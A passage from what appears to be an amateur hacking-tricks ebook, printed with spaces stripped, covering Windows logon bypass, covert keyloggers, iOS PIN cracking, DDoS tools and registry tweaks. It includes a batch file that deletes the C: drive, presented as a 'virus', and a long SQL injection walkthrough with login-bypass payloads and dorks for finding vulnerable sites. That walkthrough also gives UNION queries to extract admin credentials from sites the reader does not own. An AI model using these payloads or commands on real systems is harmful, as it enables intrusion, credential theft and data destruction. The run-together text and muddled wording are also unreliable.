Usedifferentpasswordsforeachsystem.Thisisespeciallyimportantfornetworkinfrastructurehosts,suchasservers,firewalls,androuters.It’sokaytousesimilarpasswords—justmakethemslightlydifferentforeachtypeofsystem,suchaswweraw777-Win7forWindowssystemsandwweraw453forLinuxsystems.
Usevariable-lengthpasswords.Thistrickcanthrowoffattackersbecausetheywon’tknowtherequiredminimumormaximumlengthofPasswordsandmusttryallpasswordlengthcombinations.
Don’tusecommonslangwordsorwordsthatareinadictionary.
Don’trelycompletelyonsimilar-lookingcharacters,suchas3insteadofE,5insteadofS,or!Insteadof1.Password-crackingprogramscanforthis.
Usepassword-protectedscreensavers.Unlockedscreensareagreatwayforsystemstobecompromisedeveniftheirharddrivesareencrypted.
Don’t reusethesamepasswordwithinatleastfourtofivepasswordchanges.Don’tsharepasswords.Toeachhisorherown!
Avoidstoringuserpasswordsinanunsecuredcentrallocation,suchasanunprotectedspreadsheetonaharddrive.Thisisaninvitationfordisaster.UsePasswordSafeorasimilarprogramtostoreuserpasswords.
KONBOOT
BYPASSWINDOWSLOGONSCREENPASSWORD
SometimesitcreatesacriticalconditionifyouforgotyourWindowsadministratorpasswordandit’squiteurgenttorecoveritwithoutanyflaw.Thisarticlewillmakeitconvenienttorecoveryouradminpassword.
WeareusingatoolnamedasKON-BOOT.
Kon-BootisanapplicationwhichwillbypasstheauthenticationprocessofWindowsbasedoperatingsystems.Itenablesyouloginintoanypasswordprotectedtestmachinewithoutanyknowledgeofthepassword.
Kon-Bootworkswithboth64-bitand32-bitMicrosoftWindowsoperatingsystems.
Needythings:–APenDriveorAnyUSBDevicesuchasMemoryCardorablankCD.Kon-Boot(Latestversion)Your5minutesandalsoaworkingmind.
Technicalinstructions:–1.DownloadKON-BOOTfrominternet.2.ExtracttheZIPandrunthe“KonBootInstaller.exe”3.BurntheISO.4.BootfromCD/USBdevice.5.AfterWindowsisloadeditwillshowyouaKon-bootscreen.
6.LeavethepasswordboxemptyandjusthitOKitwilldirectlyenableyouintothewindowsaccount.Limitations:ITMAYCAUSEBSOD(NOTEPADPARTICULARBUGS).
KEYLOGGERS
BEAWAREKEYSTROKELOGGING
Oneofthebesttechniquesforcapturingpasswordsisremotekeystrokelogging—theuseofsoftwareorhardwaretorecordkeystrokesasthey’retypedintothecomputer.
Generallyyouusetoaskyourfriendsorrelativesforlogginginintoyouraccountbytheircomputers.
So,becarefulwithkeyloggersinstalledintheircomputers.Evenwithgoodintentions,monitoringemployeesraisesvariouslegalissuesifit’snotdonecorrectly.Discusswithyourlegalcounselwhatyou’llbedoing,askfortheirguidance,andgetapprovalfromuppermanagement.
Loggingtools:-Withkeystroke-loggingtools,youcanassessthelogfilesofyourapplicationtoseewhatpasswordspeopleareusing:Keystroke-loggingapplicationscanbeinstalledonthemonitoredcomputer.Isuggestyoutocheckoutfamilykeyloggerby(www.spyarsenel.com).AnotherpopulartoolisInvisibleKeyLoggerStealth;DozensofothersuchtoolsareavailableontheInternet.
OnemoreyoucancheckoutisKGBemployeemonitorisoneofthefavoriteofme…..Becauseitisnotonlyinvisiblebutitwillalsonotshownbyyourtaskmanageranditusespasswordprotectiontoo.
Hardware-basedtools,suchasKeyGhost(www.keyghost.com),fitbetweenthekeyboardandthecomputerorreplacethekeyboardaltogether.Akeystroke-loggingtoolinstalledonasharedcomputercancapturethepasswordsofeveryuserwhologsin.
PREVENTIONS:
Thebestdefenseagainsttheinstallationofkeystroke-loggingsoftwareonyoursystemsistouseananti-malwareprogramthatmonitorsthelocalhost.It’snotfoolproofbutcanhelp.Asforphysicalkeyloggers,you’llneedtovisuallyinspecteachsystem.
Thepotentialforhackerstoinstallkeystroke-loggingsoftwareisanotherreasontoensurethatyourusersaren’tdownloadingandinstallingrandomsharewareoropeningattachmentsinunsolicitedemails.ConsiderlockingdownyourdesktopsbysettingtheappropriateuserrightsthroughlocalorgroupsecuritypolicyinWindows.
DOYOUHAVERATED7.9?
LearnHowtoHackWindowsExperienceIndex
StartingfromWindowsVista,MicrosoftintroducedakindofbenchmarkingsysteminitsOperatingSystem.InWindowsVistaand7userscanratetheirPCusingtheWindowsExperienceIndex.TheHighestpossiblescoreinWindowsVistais5whileWindows7machinescangoupto7.9intheexperienceindex.
IntheWindowsExperienceindexthebasescoreisbasedonthelowestscoreofanycomponent.SuchasinthetestPCitwas4.4basedbecauseoftheGraphicssubscore.
Howeveritisnotsotoughtomanipulatethesenumbersandchangethesescoresaccordingtoyourwill.Youcanchangethesejusttofoolanyone.
GETTINGSTARTED
TomakethingssimplifiedwewouldrecommendyoutorunWindowsExperienceIndexfirst(Ifyouhavenotdoneso)ifyouhavedonethatyoucanskipthissection.
TodothoseopenControlpanelsgotoSystemandsecurityandthenclickonChecktheWindowsExperienceIndex
AfterthatclickonRateThiscomputerNotethatyourComputermaytakeseveralminutesinratingthesystem
Youwillseeascreensimilartothis.
MESSINGUPWITHSCORESTomanipulatethesescoresheadtoWindowsinstallationdrive(C:inourcase).Thengoto
Windows>Performance>WinSAT>DataStoreYouwillabletoseeseveralindexingfilesthere.
Youwillneedtoopenthefileendingwith“Formal.Assessment(Initial).WinSAT”
Openthefileinnotepad.Youwillseethefollowingwindow:
Inthenotepadwindowyoudon’tneedtodotoodowntohuntanything,simplychangethevaluesaccordingtoyourwillintheupperarea.Thevaluesarewrittenbetweentags.Suchas
<MemoryScore>5.9</MemoryScore>
Changethevaluesbetweentagsandsavethefiles.NexttimeyouwillopentheWindows<ExperienceIndexthevalueswillbechanged.
OFFTHEROADTIP:FormorefunwesuggesteveryonetokeeptheirScoresrealistic(Not7.9Exactly)
Torevertthechangesyoucanre-runtheassessment.
THEHIDDENDRIVES
HACKTOHIDELOCALDRIVES
Inthisarticlewearegoingtolearnabouthidingthestuffs.Generally,youguysusetohidetheparticularfilewhichyouwanttokeeppersonal.Whichisthemostcommonwayinthesedaysanditcaneasilybeexposedevenbyamiddleschoolchild.
But,herewearegoingtolearnthathowtohidethewholespecifieddrives(localdisks)whichkeepyousafefromyourfamilychild.Youcaneasilykeepyourdatasafeeitheritisyourgirlfriend’spicorblah…blah…blah…!
Let’sstarttolearnhowtohidethespecifieddrivesstepbystep:-
Forhidingthedrivesyouhavetoeditthegrouppoliciesofyourcomputer.Foreditinggrouppoliciesjustgoonthe“run”optionandtype “gpedit.msc”andclickonok.OrYoucaneasilysearchinyoursearchboxfortheGROUPPOLICY.
Thegrouppolicyeditorwillbeopenedafteryou!
Thenyouwillseeintheleftpartofthewindowthereisa“USER
CONFIGURATION”option.Undertheuserconfigurationoptiontherearethreeoptions:1.)Softwaresettings2.)Windowssettings3.)Administrativetemplates
Justgiveasingleclickontheadministrativetemplateoption.Youseethatsomeoptionsaremadeavailableintherightpartofthewindow.Openthe“allsettingsoption.”
Whenyouopenedthe“allsettingsoptions”thereisalistoflotofoptionsdisplayedafteryou!Clickonthe“settings”optiontoarrangethemthenalphabetically.Ifalreadyarranged
youcanskipthisstep.
Nowclickingsometimesthe“H”keyofyourkeyboardsearchforthe“hidethesespecifieddrivesinmycomputer”option.
Doubleclickonthe“hidethesespecifieddrivesinmycomputer” option.Awindowwillopensafteryou.
“ENABLE”itand chooseforthedriveswhichyouwanttohidefromthegivenoptionsinthelowerleftpartofthewindow.Afterapplyingthesettingsjustclickonokandyouseethedriveswillhideaccordingtoyourchoice.IhaveselectedtohideonlyA,B,CandDdrivesonlysotheE:drivewillnotbehiddeninthescreenshotgivenbelow.
Intheabovegivenscreenshotonly“E:”driveisshowntotheuser.Ifyouwanttoaccessthedriveswhicharehiddenthenyouhavetoclickontheaddressbarofmycomputer’swindowasmarkedintheabovescreenshotandtypeD:”or“C:”andclickonENTERbuttonofyourkeyboardtoopenthedrivesrespectively.
EMPTYHDD
FORMATHARDDISKWITHNOTEPAD
InthisarticlewearegoingtolearnhowtodeletecompletelyyourC:driveofyourcomputerwithoutaformattingcompactdisk.JustdoitonyourownriskbecauseitwilldestroythewindowsofyousystemandforthisIamnotresponsible.
FOLLOWTHEBELOWSTEPSTOFORMATYOUC:DRIVE:_Openthenotepadandtypethefollowinggivecode
CODE:@echooffdelC:\*.*\y
Saveitwiththeextension“.bat”Suchas“virus.bat”.
Doubleclickonthesavedfiletorunthisvirus.Commandpromptwillbeopenedafteryouwhereitwillbedeletingyourdrive.Note:“Ihavenottriedthisvirusyet,andalsopleasedon’ttryonyourpersonalcomputers.Ifyouhavetriedeverpleasegivemethereviews.”
LET’SHAVESOMEFUN
FUNNYVIRUSTOSHOCKYOURFRIENDS
Helloguys,Ithinkafterreadingtheabovechaptersnowit’stimetohavesomefun.Inthisarticlewearegoingtolearnthathowtogiveashocktoyourfriendforaminute.
Basicallyherewearegoingtocreateafunnyviruswhichwillnotactuallyharmyourfriend’scomputerbutitwillshockhim/herforaminute.
Solet’screatethatvirusfollowingthesamestepsaswehavecreatedsomevirusesinpreviouschapters.Sofollowthesteps:Openthenotepadandtypethefollowingcode:
CODES:@echooffmsg*yourcomputerisattackedbyavirus.msg*clickoktoformat.msg*allyourdatahasbeendeleted.
Savethedocumentwiththeextension“.bat”Forexampleyoucansavethevirusbythename“funnyvirus.bat”
Nowyourworkistoexecutethevirus.Justdoubleclickonthevirusanditwillshowyouamessagethat
“yourcomputerisattackedbyavirus”.
Noweitheryouclickon“ok”oryouclosetheabovemessagebox,itwillagainshowyouamessage“clickoktoformat”.AndIamsurethatyouwillnotgoingtoclickonok.Butagainitdoesnotmatterifyouclickonokorclosethebox,butIamsurethatyouwillclosethebox.Againitwillshowyouamessagethat“allyourdatahasbeendeleted”.Andforamomentyourfriend’sheartbeataregoingtobeontheoptimum.
Sothisisafunnywaytoshockyourfriendswithoutharmingthemactually.
DOYOUHAVEi7
?HOWTOCHANGEYOURPROCESSORNAME
ThetrickwearegoingtolearnhereisthemostinterestingtrickandIamsurethatitwillincreaseyourprestigeamongyourfriends.Becausenowthesedaysit’sabigdealamongthegroupofyourfriendthatifyouhavei3,i5ori7processor.Solet’slearnhowtochangeyourpcfromanyofcoreprocessortoi7.
Forityouhavetofollowthesesteps:
Firstofallyouhavetogoonthe“run”optionandwrite“regedit”toopentheregistryeditorofyourcomputerandclickonokItwillopentheregistryeditingwindowafteryou.
Openthe“HKEY_LOCAL_MACHINE”ashighlightedinthefigure.
Thenopenthe“hardware”optionpresentunderit.
Thenopenthe“Description”optionandthenopenthe“system”option.Alsoopenthe“centralprocessor”optionundersystemoption.
Thengiveasingleclickto“0”folderpresentunder“centralprocessor”.Andthenyouwillseethatintherightpartoftheregeditwindowthereappearalotofoptions.ThisiscalledasSTRINGS.Searchforthe“processornamestring”amongthosestrings.
Opentheprocessornamestringgivingadoubleclickonit.Adialogueboxwillopen
afteryou.Inthe“valuedata”textboxitiswrittenwhatyourcomputer’sprocessoractuallyis.
Iamusing“Pentium(R)Dual-CoreCPUT4500@2.30GHz”aswritteninthevaluedata.Nowdeletethosetextsandwriteyourowntextreplacingthem.Suchasyoucanwrite”Intel(R)Corei7CPU T9500@2.30GHz”andclickon“ok”option.
Nowclosetheregistryeditorandlet’scheckifitisworkingornot.Forcheckingit,youhavetocheckthepropertiesofyourcomputer.Forcheckingit,justgivearightclickonmycomputericonandclickonthe“properties”optionwhichisthelastoptionofthedialoguebox.
Thesystempropertiesofyourcomputerareshownafteryou.
Yuppie!Asyouhaveseenintheprocessornameitwillbeasexpected.Nowyourprocessoristurnedintoi7.
Andnow youcansaywithproudthatYOUHAVEACOREi7PROCESSOR.
HOWTOMAKEYOURGOOGLESEARCHSEFFECTIVE
InthisarticlewearegoingtolearnhowtomakeourGooglesearcheseffective.IfwehavetofindanythingonGoogleweusetoopentheGooglewebsiteandstartsearchinglikeifyouwanttodownloadanybookonGoogleyouusetowritelikethis“fiftyshadesofgreyforfree”.AndyouwillfindahugeamountofresultsonGooglelike753286543567resultsin0.43secondsandwillmakeyoudifficulttofindtheexactworkingdownloadlinkofthatbook.
YoucantakesomeverysimplestepstoreduceyourGooglesearchesresults.Let’sassumewehavetodownloadthesamebookasabovementioned.IfyouusetowriteinthefollowingwayitwillreduceyourGooglesearchesandmakeitsimpletofindtheexactdownloadlink.WriteinthiswayintheGooglesearches:Youhavetowriteyoursearchesunderdoublequotes.Like:-“fiftyshadesofgrey.pdf”Note:-don’tforgettoapplytheextension“.pdf”
Secondmethod:-using“GOOGLEHACKS”Youcanalsouseanapplicationnameas“Googlehacks”.ItiseasilyavailableonthenetandyoucandownloaditeasilybyGooglesearches.
Thisapplicationalsohelpsyoualotinperformingeffectivesearches.
iOSPASSWORDCRACKING
IOSPASSWORDCRACKING
Nowthesedays’peoplegenerallyuse4-digitpintosecuretheirphone.Amobiledevicegetslostorstolenandallthepersonrecoveringithastodoistrysomebasicnumbercombinationssuchas1234,1212,or0000.andsoonthewillbeunlocked.
Let’sseehowtocrackyouriospassword:1.ForthefirststepyouhavetoplugyouiPhoneorcomputerintodevicefirmwareupgrademodei.e.DFUmode:
ToenterDFUmode,simplypowerthedeviceoff,holddowntheHomebutton(bottomcenter)andsleepbutton(uppercorner)atthesametimefor10seconds,andcontinueholdingdowntheHomebuttonforanother10seconds.Themobiledevicescreengoesblank.
2.afterputtingyourphoneintoDFUmodeyouneedtoLoadtheiOSForensicToolkitforthisyouneedtoinsertyourUSBlicensedongleintoyourcomputerandrunningTookit.cmd:
3.AfterthattheworkistodoistoloadtheiOSForensicToolkitRamdiskontothemobiledevicebyselectingoption2LOADRAMDISK:WhenyouloadedtheRAMDISKcodeitallowsyourcomputertocommunicatewiththemobiledeviceandrunthetoolswhichareneededforcrackingthepassword(amongotherthings).
4.NowyouneedtoselecttheiOSdevicetype/modelthatisconnectedtoyourcomputer,asshowninFigure:
Idon’thaveiphone6withmenowso;Ihaveselectedoption14becauseIhaveaniPhone4withGSM.
Afterthatyouseethetoolkitwhichisconnectingtothedeviceanditconfirmsasuccessfulload,asshowninFigure:
AlsoyouwillseetheElcomsoftlogointhemiddleofyourmobiledevice’sscreen……Ithinkitlookspretty:
6.Nowifyouwanttocrackthedevice’spassword/PIN,youhavetosimplyselecttheoption6GETPASSCODEonthemainmenu:
iOSForensicToolkitwillpromptyoutosavethepasscodetoafile.Forsavingthepasscodesimply;youcanpressEntertoacceptthedefaultofpasscode.txt.Thecrackingprocesswillcommenceand,withanyluck,thepasscodewillbefoundanddisplayedafteryouasshowninFigure:
So,havingnopasswordforphonesandtabletsisbad,anda4-digitPINsuchasthisisalsonotmuchbetterchoice.Sobeawareabouttheattacks!Getup-users-getupit’stimetobesecured.YoucanalsouseiOSForensicToolkittocopyfilesandevencrackthekeychainstouncoverthepasswordthatprotectsthedevice’sbackupsiniTunes(option5GETKEYS).
PREVENTION:Forthepreventionfrombeinghackedyoucanrefertothechapter“PASSWORDCREATINGPOLICIES”.
HIDEYOURRECYCLEBIN
HACKTOHIDETHERECYCLEBIN
SometimeswhenyoujusttrytomodifythewindowsGUIorevenyouusetoinstallanythemeforyourwindowssometimesyoufindthattherecyclebiniconremainsnotmodifiedanddestroysthebeautyofyourmodification.
SointhisarticlewearegoingtolearnthathowtodeletetheRECYCLEBINbyhackingregistry.
Fordeletingtherecyclebinyouneedtoopentheregistryeditorofyourcomputer.Ithinknowafterreadingtheabovesectionsyouarefamiliarwiththe“registryeditor”.Sogothroughtheregistryeditorandfollowthegivenpath.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe00AA002F954E}
Whenyoufinallyopenedthelastpath,youwillseethedefaultstringofrecyclebinisdefined.NowDELETEthatstringandrestartyourcomputer.Youwillfindthatrecyclebinisdeleted.Iamattachingascreenshotforyourease.
Byfinalizingallstepsdon’tforgettorestartyourcomputer.Itwillworkonlyontherestart.
HOWBOTNETDDoSATTACKWORKS…
DDoSAttack?
DDoSstandsfor“DistributedDenialofService.”ADDoSattackisalsoamaliciousconceivetoproduceaserveroranetworkresourceinaccessibletousers,normallybyquicklyofficiouswithorsuspendingtheadministrationsofahostrelatedtothenet.IncontrasttoaDenialofService(DoS)attack,insidethatonecomputerandoneinternetassociationisusedtofloodtargetedresourcewithpackets,aDDoSattackusesmanycomputersandlotsofinternetconnections.DDoSattacksislooselydividedintothreedifferenttypes.Thefirst,ApplicationLayerDDoSAttacksembraceSlowloris,Zero-dayDDoSattacks,DDoSattacksthatconsiderApache,WindowsorOpenBSDvulnerabilitiesandextra.ComprisedofSeeminglylegitimateandinnocentrequests,thegoaloftheseattacksistocrashthenetserver,andadditionallythemagnitudeismeasuredinRequestspersecond.ThesecondkindofDDoSattack,ProtocolDDoSAttacks,alongwithSYNfloods,fragmentedpacketattacks,PingofDeath,SmurfDDoSandextra.Thissortofattackconsumesactualserverresources,orthoseofintermediatefacility,likefirewallsandloadbalancers,andismeasuredinPacketspersecond.ThethirdkindofDDoSattackisusuallythought-abouttomostdangerous.Volume-basedDDoSAttacksembraceUDPfloods,ICMPfloods,anddifferentspoofedpacketfloods.Thevolume-basedattack’sgoalistosaturatetheinformationmeasureoftheattackedwebsite,andmagnitudeismeasuredinBitspersecond.
Botnet?
Sometimesobservedasa“BunchofZombies,”aBotnetmaybeaclusterofInternet-connectedcomputers,everyofthathasbeenmaliciouslycondemned,sometimeswiththehelpofmalwarelikeTrojanHorses.Usuallywhilenotthedataofthecomputers’rightfulhomeowners,thesemachinessquaremeasureremotelycontrolledbyanexternalsourceviacommonplacenetworkprotocols,andoftenusedformaliciousfunctions,mostordinarilyforDDoSattacks.
BotnetTools
TheconceiverofaBotnetisoftenbroughtupasa“botherder”or“botmaster.”ThisindividualcontrolstheBotnetremotely,usuallythroughassociateIRCserverorachannelonapublicIRCserver–referredtoasthecommandandcontrol(C&C)server.TocommunicatewiththeC&Cserver,thebotmasterusesnumeroushiddenchannels,aswellasapparentlyinnocuoustoolslikeTwitterorIM.Alotofadvancedbotsautomaticallyhuntdownalotofresourcestoexploit,joiningalotofsystemstotheBotnetduringaprocessreferredtoas“scrumping.”BotnetserversmightcontinuallycommunicateandworkwithdifferentBotnetservers,makingentirecommunitiesofBotnet’s,withindividualormultiplebotmasters.ThisimpliesthatanygivenBotnetDDoSattackmayverywellhavemultipleorigins,orbecontrolledbymultiplepeople,generallyoperatingincoordination,generallyoperatingsingly.Botnetsareaunitobtainableforrentorleasefromnumeroussources,anduseofBotnet’sareauctionedandlistedamongattackers.Actualmarketplaceshavesprungup–platformsthatmodifycommercialisminlargenumbersofmalware-infectedPCs,whichmightberentedandemployedinBotnetDDoSordifferentattacks.TheseplatformsofferBotnetDDoSattackperpetratorswithanentireandrichly-featuredtoolkit,andadistributionnetworkadditionally.Evenfornon-technicalusers,BotnetDDoSattackingmaybeaviableandefficientchoiceto“takeout”acompetitor’swebsite.Atintervalsthecrimesystem,BotnetDDoSattacksareaunitathoughtartifact,withcoststakingplace,andeffectivenessandclassgrowing.Anumberoftheforemost
commontoolsforinitiatingaBotnetDDoSattackaresimplydownloadedfrommultipleon-linesources,andinclude:
SlowLoris
EspeciallydangeroustohostsrunningApache,dhttpd,tomcatandGoAheadWebServer,Slowlorismaybeahighlytargetedattack,enablingoneinternetservertorequiredownanotherserver,whilenottouchingdifferentservicesorportsonthetargetnetwork.
Tor’sHammer
IsaslowpostdostestingtoolwritteninPython.ItalsocanberunthroughtheTornetworktobeanonymized.ThereareseveraltoolsfortestingserverreadinesstoresistBotnetDDoSattacks.
QslowlorisUsesQtlibrariestoexecutethewaysutilizedbySlowloris,providingagraphicalinterfacethatcreatestheprogramhighlysimpletouse.ApacheKiller
UtilizesanexploitwithintheApacheOSinitialdiscoveredbyaGooglesecurityengineer.ApacheKillerpingsaserver,tellstheservertointerruptupwhateverfileistransferredintoahugerangeoflittlechunks,usingthe“range”variable.Whentheservertriestoadjusttothisrequest,itrunsoutofmemory,orencountersalternativeerrors,andcrashes.
PyLorisItisascriptabletoolfortestingaservice’slevelofvulnerabilitytoaspecificcategoryofDenialofService(DoS)attackDDoSim
WhichcanbeemployedinalaboratoryatmospheretosimulateaDDoSattack,andhelpslivethecapabilityofagivenservertohandleapplication-specificDDOSattacks,bysimulatingmultiplezombiehostswithrandomIPaddressesthatcreatetransmissioncontrolprotocolconnections.
BotnetDDoSAttacks
BotnetDDoSattacksarequicklyturningintotheforemostprevailingvarietyofDDoSthreat,growingspeedilywithinthepastyearineachnumberandvolume,consistentwithrecentmarketingresearch.Thetrendistowardsshorterattackperiod,howeverlargerpacket-persecondattackvolume,andthereforetheoverallvarietyofattacksaccordinghasgrownupmarkedly,aswell.Thetypicalattackinformationmeasureascertainedthroughoutthiseraof2010-2012wasfive.2Gbps,whichis148%abovethepreviousquarter.AnothersurveyofDDoSattacksfoundthatquite400thofrespondent’soldattacksthatexceeded1Gbitspersecondinbandwidthin2011,and13weretargetedbyaminimumofoneattackthatexceeded10Grate.Fromamotivationalperspective,neweranalysisfoundthatideologicallydrivenDDoSattacksareontheincrease,supplantingmonetarymotivationbecausethemostfrequentincentivesuchattacks.
WEBSITEHACKING
WEBSITEHACKING
Nowtakeyourtimeandbeseriousandfreebeforestartingthisarticlebecausethisistheverywideandoneofthemostinterestingarticlesamongalloftheabovechapters.WewilldiscussinthischapterthathowtohackanyvulnerablesiteusingSQLinjection.
WhatisSQLInjection?
SQLinjectionisoneofthepopularwebapplicationshackingmethod.UsingtheSQLInjectionattack,anunauthorizedpersoncanaccessthedatabaseofthewebsite.AttackercanextractthedatafromtheDatabase.
WhatahackercandowithSQLInjectionattack?
*ByPassingLogins*Accessingsecretdata*Modifyingcontentsofwebsite*ShuttingdowntheMySQLserver
So,herewestartwithbypassinglogin…….i.e.Authenticationbypass:
InthistypeofSQLinjectiongenerallyifwehadfoundtheAdminloginpageandafterthatwewilltrytoopenthecontrolpanelaccountoftheadminbypassingtheauthentication.Ifyouhavetheadminloginpageofanywebsitethenyoucanpastethefollowingcodes(withquotes)tobypasstheauthenticationofthewebsite….generallyPHPwebsitesarevulnerabletothisinjection:
YoucanfindthesetypesofsitessimplybyGooglesearches.YouhavetotypelikethisintheGooglesearchbar:
www.thesitename.com/adminlogin.php?Or/admin.php?OrWp-login.php?Etc.
AfterfindingtheloginpageyouhavetopastethefollowingcodesinbothuserIDandpasswordoftheadminpagetillitwillbypassed.IfnotwewilltrythenextSQLinjectioni.e.unionbased,blindbased,errorbasedetc.
CodestobeusedasbothuserIDandpasswordattheadminloginpageofvulnerablewebsiteforbypassingauthenticationareasfollow:
‘or’1’=’1‘or‘x’=‘x‘or0=0–”or0=0–or0=0–‘or0=0#”or0=0#or0=0#‘or‘x’=‘x”or“x”=”x‘)or(‘x’=‘x‘or1=1–”or1=1–or1=1–‘ora=a–”or“a”=”a‘)or(‘a’=‘a“)or(“a”=”ahi”or“a”=”ahi”or1=1–hi’or1=1–‘or’1=1’
Iftheauthenticationbypasswillnotworkthentrythefollowingtechniquescarefullyandstepbystep:UNIONBASEDSQLi:FindingVulnerableWebsite:
TofindaSQLInjectionvulnerablesite,youcanuseGooglesearchbysearchingforcertainkeywords.Thatkeywordoftencalledas“GOOGLEDORK”.
SomeExamples:inurl:index.php?id=inurl:gallery.php?id=inurl:article.php?id=inurl:pageid=
NowyouhavetoCopyoneoftheabovekeywordandGoogleit.Here,wewillgetalotofsearchresultswithwhichwehavetovisitthewebsitesonebyoneforfindingthevulnerability.
Forexample:site:www.anyselectedsite.cominurl:index.php?id=Step1:FindingingtheVulnerability:
Nowletusthevulnerabilityofthetargetwebsite.Tothevulnerability,addthesinglequotes(‘)attheendoftheURLandpressenter.
Foreg:
http://www.anyselectedsite.com/index.php?id=2‘Ifthepageremainsinsamepageorshowingthatpagenotfound,thenitisnotvulnerable.Ifyougotanerrormessagejustlikethis,thenitmeansthatthesiteisvulnerable.
YouhaveanerrorinyourSQLsyntax;themanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear‘'’atline1
Step2:FindingNumberofcolumnsinthedatabase:Great,wehavefoundthatthewebsiteisvulnerabletoSQLiattack.OurnextstepistofindthenumberofcolumnspresentinthetargetDatabase.Forthatreplacethesinglequotes(‘)with“orderbyn”statement.Changethenfrom1,2,3,4,,5,6,…n.Untilyougettheerrorlike“unknowncolumn“.
Foreg:http://www.anyselectedsite.com/index.php?id=2orderby1http://www.anyselectedsite.com/index.php?id=2orderby2http://www.anyselectedsite.com/index.php?id=2orderby3http://www.anyselectedsite.com/index.php?id=2orderby4Ifyougettheerrorwhiletryingthe“n”thnumber,thennumberof
columnis“n-1”.Imean:http://www.anyselectedsite.com/index.php?id=2orderby1(noerrorshownshown)http://www.anyselectedsite.com/index.php?id=2orderby2(no
errorshown)http://www.anyselectedsite.com/index.php?id=2orderby3(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby4(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby5(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby6(no
errorshown)http://www.anyselectedsite.com/index.php?id=2orderby7(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby8(errorshown)
Sonown=8,thenumberofcolumnisn-1i.e.,7.
Incase,iftheabovemethodfailstoworkforyou,thentrytoaddthe“—”attheendofthestatement.Foreg:
http://www.anyselectedsite.com/index.php?id=2orderby1-Step3:FindtheVulnerablecolumns:
Wehavesuccessfullyfoundthenumberofcolumnspresentinthetargetdatabase.Letusfindthevulnerablecolumnbytryingthequery“unionselectcolumnssequence”.
Changetheidvaluetonegative(imeanid=-2).Replacethecolumns_sequencewiththenofrom1ton-1(numberofcolumns)separatedwithcommas(,).
Foreg:
Ifthenumberofcolumnsis7,thenthequeryisasfollow:http://www.anyselectedsite.com/index.php?id=-2unionselect1,2,3,4,5,6,7—
Ifyouhaveappliedtheabovemethodandisnotworkingthentrythis:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,3,4,5,6,7-
Onceyouexecutethequery,itwilldisplaythevulnerablecolumn.
Bingo,column‘3’and‘7’arefoundtobevulnerable.Letustakethefirstvulnerablecolumn‘3’.Wecaninjectourqueryinthiscolumn.Step4:Findingversion,database,userReplacethe3fromthequerywith“version()”Foreg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,version(),4,5,6,7—Now,Itwilldisplaytheversionas5.0.2or4.3.Somethinglikesthis.Replacetheversion()withdatabase()anduser()forfindingthedatabase,userrespectively.Foreg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,database(),4,5,6,7-http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,user(),4,5,6,7-Iftheaboveisnotworking,thentrythis:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect
1,2,unhex(hex(@@version)),4,5,6,7-
Step5:FindingtheTableNameIftheDatabaseversionis5orabove.Iftheversionis4.x,thenyouhavetoguessthetablenames(blindsqlinjectionattack).Letusfindthetablenameofthedatabase.Replacethe3with“group_concat(table_name)andaddthe“frominformation_schema.tableswheretable_schema=database()”
Foreg:
http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,group_concat(table_name),4,5,6,7frominformation_schema.tableswheretable_schema=database()-
Nowitwilldisplaythelistoftablenames.Findthetablenamewhichisrelatedwiththeadminoruser.
Letuschoosethe“admin”table.Step6:FindingtheColumnNameNowreplacethe“group_concat(table_name)withthe“group_concat(column_name)”
Replacethe“frominformation_schema.tableswheretable_schema=database()—”with“FROMinformation_schema.columnsWHEREtable_name=mysqlchar—
WehavetoconvertthetablenametoMySqlCHAR()string.InstalltheHackBaraddonfrom:https://addons.mozilla.org/en-US/firefox/addon/3899/
Onceyouinstalledtheadd-on,youcanseeatoolbarthatwilllooklikethefollowingone.IfyouarenotabletoseetheHackbar,thenpressF9.
Selectsql->Mysql->MysqlChar()intheHackbar.
ItwillaskyoutoenterstringthatyouwanttoconverttoMySQLCHAR().WewanttoconvertthetablenametoMySQLChar.Inourcasethetablenameis‘admin’.
NowyoucanseetheCHAR(numbersseparated
withcommans)intheHacktoolbar.
Copyandpastethecodeattheendoftheurlinsteadofthe“mysqlchar”
Foreg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,group_concat(column_name),4,5,6,7frominformation_schema.columnswheretable_name=CHAR(97,100,
109,105,110)—Theabovequerywilldisplaythelistofcolumn.Forexample:
admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_usernme,username,password..etc..
Nowreplacethereplacegroup_concat(column_name)withgroup_concat(columnname1,0x3a,anothercolumnname2).
Nowreplacethe”fromtable_name=CHAR(97,100,table_name”information_schema.columnswhere
109,105,110)”withthe“fromForeg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7fromadmin-Iftheabovequerydisplaysthe‘columnisnotfound’error,thentryanothercolumnnamefromthelist.
Ifwearelucky,thenitwilldisplaythedatastoredinthedatabasedependingonyourcolumnname.Forexample,usernameandpasswordcolumnwilldisplaythelogincredentialsstoredinthedatabase.
Step7:FindingtheAdminPanel:
Justtrywithurllike:http://www.anyselectedsite.com/admin.phphttp://www.anyselectedsite.com/admin/http://www.anyselectedsite.com/admin.htmlhttp://www.anyselectedsite.com:2082/etc.
Ifyouarelucky,youwillfindtheadminpageusingaboveurlsoryoucanusesomekindofadminfindertoolslikeHavijadminfinder,sqlpoisonforSQLattacking(tool).
Andonceyoufoundtheadminpanelyouhavetodofurtherworksonyourownrisk.PREVENTION:
Thisarticleisfocusedonprovidingclear,simple,actionableguidanceforpreventingSQL
Injectionflawsinyourapplications.SQLInjectionattacksareunfortunatelyverycommon,andthisisduetotwofactors:
